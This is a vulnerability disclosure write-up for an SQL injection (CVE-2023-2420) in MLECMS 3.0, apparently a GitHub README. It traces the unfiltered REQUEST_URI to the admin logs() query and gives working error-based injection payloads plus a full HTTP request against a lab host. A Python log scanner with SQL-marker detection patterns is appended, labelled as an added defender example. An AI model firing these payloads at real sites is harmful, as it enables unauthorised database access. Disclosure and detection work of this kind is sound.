CVE-2023-2420: elecms/README.md at main · VG00000/elecms

A vulnerability was found in MLECMS 3.0. It has been rated as critical. This issue affects the function get_url in the library /upload/inc/lib/admin of the file upload\inc\include\common.func.php. The manipulation of the argument $_SERVER['REQUEST_URI'] leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227717 was assigned to this vulnerability.


Source code download address: http://www.mlecms.com/download/zip/mlecms-3.0.zip. Operating environment: Nginx + MySQL.

A vulnerability exists in the get_url() function at lines 40-53 of the file upload\inc\include\common.func.php. This function reads the URL directly from $_SERVER and returns it without any filtering, which can lead to SQL injection or XSS.

A global search for "get_url" shows that it is used in /upload/inc/lib/admin.lib.php, where its return value is concatenated directly into SQL statements.

Open that file at line 49: the risky SQL statement is in the logs() method.

Following the logs method further, it is called at lines 13 and 16 of the file \upload\admin\channel_manage.php.

Analysing the routing together with the file name locates the function in the admin UI at "网站频道管理" (website channel management).

Analysing channel_manage.php shows that admin::logs is executed only when $_GET['del'] is a number and $ass['id'] is empty.

After analysing $db->query and testing with a constructed request, it turns out that passing a channel ID to delete that is greater than any existing channel ID makes $ass['id'] null. Because $_GET['del'] must be a number while the vulnerable value is the URL itself, the injected characters have to be placed in the URL rather than in the parsed parameter. Combined with the SQL statement, the following error-based injection can therefore be used to query the database name: channel_manage.php?del=1111#'or updatexml(1,concat(0x7e,database()),0) or'

Querying the database user

The test environment is Nginx + MySQL. If other middleware is used, the request may need to be rebuilt. The request used:

GET /admin/channel_manage.php?del=1111#'or updatexml(1,concat(0x7e,user()),0) or' HTTP/1.1
Host: 192.168.31.128:90
accept: /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=1ohoqsk1aaiaj81sr1ngt5phm0; mlecms_global_language=1
Connection: close
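As an added defender-side example (not part of the original write-up or of the MLECMS code), the following Python scans constructed nginx access-log lines for the exact pattern described above: a request whose parsed del parameter passes the numeric check while the raw request URI that get_url() returns still carries injected characters. The endpoint path, the allowed-character whitelist, the marker list and the log lines are all assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx access-log lines (not taken from the original page); the
# second and third imitate the shape of the request shown in the write-up above.
SAMPLE_LOG = """\
192.168.31.10 - - [10/Apr/2023:12:00:01 +0800] "GET /admin/channel_manage.php?del=12 HTTP/1.1" 200 512
192.168.31.10 - - [10/Apr/2023:12:00:02 +0800] "GET /admin/channel_manage.php?del=1111#'or%20updatexml(1,concat(0x7e,database()),0)%20or' HTTP/1.1" 500 88
192.168.31.10 - - [10/Apr/2023:12:00:03 +0800] "GET /admin/channel_manage.php?del=7%27%20or%201%3D1 HTTP/1.1" 200 512
192.168.31.10 - - [10/Apr/2023:12:00:04 +0800] "GET /admin/index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Everything the raw request target is allowed to look like for this endpoint (assumed whitelist).
ALLOWED_TARGET = re.compile(r'^/admin/channel_manage\.php(?:\?[A-Za-z0-9_=&]*)?$')
# Characters and keywords that have no business in a numeric-only delete request.
SQL_MARKERS = re.compile(r"['\"()#]|\b(?:updatexml|extractvalue|union|select|sleep)\b", re.I)

def inspect_target(target):
    """Compare the check the application makes with the check it would need."""
    # Assumption (matches the nginx set-up in the write-up): the web server drops
    # everything from '#' onward when building the query string PHP parses into
    # $_GET, but $_SERVER['REQUEST_URI'] still carries the full raw target.
    query = urlsplit(target.split('#', 1)[0]).query
    del_values = parse_qs(query).get('del', [])
    del_numeric = bool(del_values) and del_values[0].isdigit()
    decoded = unquote(target)
    markers = sorted({m.lower() for m in SQL_MARKERS.findall(decoded)})
    return {
        'del_numeric': del_numeric,                           # what channel_manage.php validates
        'raw_uri_clean': bool(ALLOWED_TARGET.match(target)),  # what it never validates
        'markers': markers,
        # Numeric 'del' plus a dirty raw URI is the combination that reaches logs().
        'reaches_sql': del_numeric and not ALLOWED_TARGET.match(target),
    }

def scan_log(text):
    """Return (target, status, verdict) for every request to the vulnerable endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m or not m['target'].startswith('/admin/channel_manage.php'):
            continue
        findings.append((m['target'], int(m['status']), inspect_target(m['target'])))
    return findings

if __name__ == '__main__':
    for target, status, verdict in scan_log(SAMPLE_LOG):
        print(status, target, verdict)
```

A 500 response paired with reaches_sql being true is the signature worth alerting on, since error-based injection relies on the database raising an error.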
